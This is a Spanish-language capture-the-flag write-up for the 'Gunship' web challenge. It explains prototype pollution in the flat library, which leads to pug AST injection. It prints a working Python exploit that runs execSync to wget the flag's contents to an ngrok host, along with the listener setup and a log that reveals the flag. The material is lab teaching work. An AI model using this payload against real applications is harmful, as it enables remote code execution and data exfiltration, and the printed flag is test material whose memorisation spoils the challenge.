Gunship

Challenge Description

A city of lights, with retrofuturistic 80s peoples, and coffee, and drinks from another world… all the wooing in the world to make you feel more lonely… this ride ends here, with a tribute page of the British synthwave band called Gunship. 🎶

Categoria: Web
Dificultad: Muy Fácil

Solution

Analizando el codigo de la aplicacion vemos el siguiente endpoint.

challenge/routes/index.js
router.post('/api/submit', (req, res) => {
    const { artist } = unflatten(req.body);

	if (artist.name.includes('Haigh') || artist.name.includes('Westaway') || artist.name.includes('Gingell')) {
		return res.json({
			'response': pug.compile('span Hello #{user}, thank you for letting us know!')({ user: 'guest' })
		});
	} else {
		return res.json({
			'response': 'Please provide us with the full name of an existing member.'
		});
	}
});

La funcion esta utilizando pug.compile y en el archivo package.json vemos la version.

challenge/package.json
	"dependencies": {
		"express": "^4.17.1",
		"flat": "5.0.0",
		"pug": "^3.0.0"
	}

Investigando la version nos percatamos que tiene vulnerabilidades relacionadas con prototype pollution. Esto lo podemos explotar de la siguiente forma.

import requests

url = 'http://94.237.59.180:50082/api/submit'

name = {
    "artist.name":"Westaway"
}

payload = {
    "__proto__.block": {
        "type": "Text", 
        "line": "console.log(process.mainModule.require('child_process').execSync('wget https://9949-31-208-78-26.ngrok-free.app/`(cat flag*)`').toString())"
    }
}

response_send = requests.post(url, json=payload)
response_execute = requests.post(url, json=name)

print(response_send.text)
print(response_execute.text)

Levantamos nuestro ngrok y servidor python.

ngrok http 8081
python3 -m http.server 8081

Ejecutando el script y obtenemos la flag.

python3 exploit.py
┌──(root㉿kali)-[~/Downloads]
└─# python3 -m http.server 8081
Serving HTTP on 0.0.0.0 port 8081 (http://0.0.0.0:8081/) ...
127.0.0.1 - - [18/Feb/2025 11:46:58] code 404, message File not found
127.0.0.1 - - [18/Feb/2025 11:46:58] "GET /HTB%7Bwh3n_lif3_g1v3s_y0u_p6_st4rT_p0llut1ng_w1th_styl3%21%21%7D HTTP/1.1" 404 -

References

https://blog.p6.is/AST-Injection/
https://portswigger.net/daily-swig/prototype-pollution-the-dangerous-and-underrated-vulnerability-impacting-javascript-applications
https://itnext.io/prototype-pollution-attack-on-nodejs-applications-94a8582373e7
https://ngrok.com/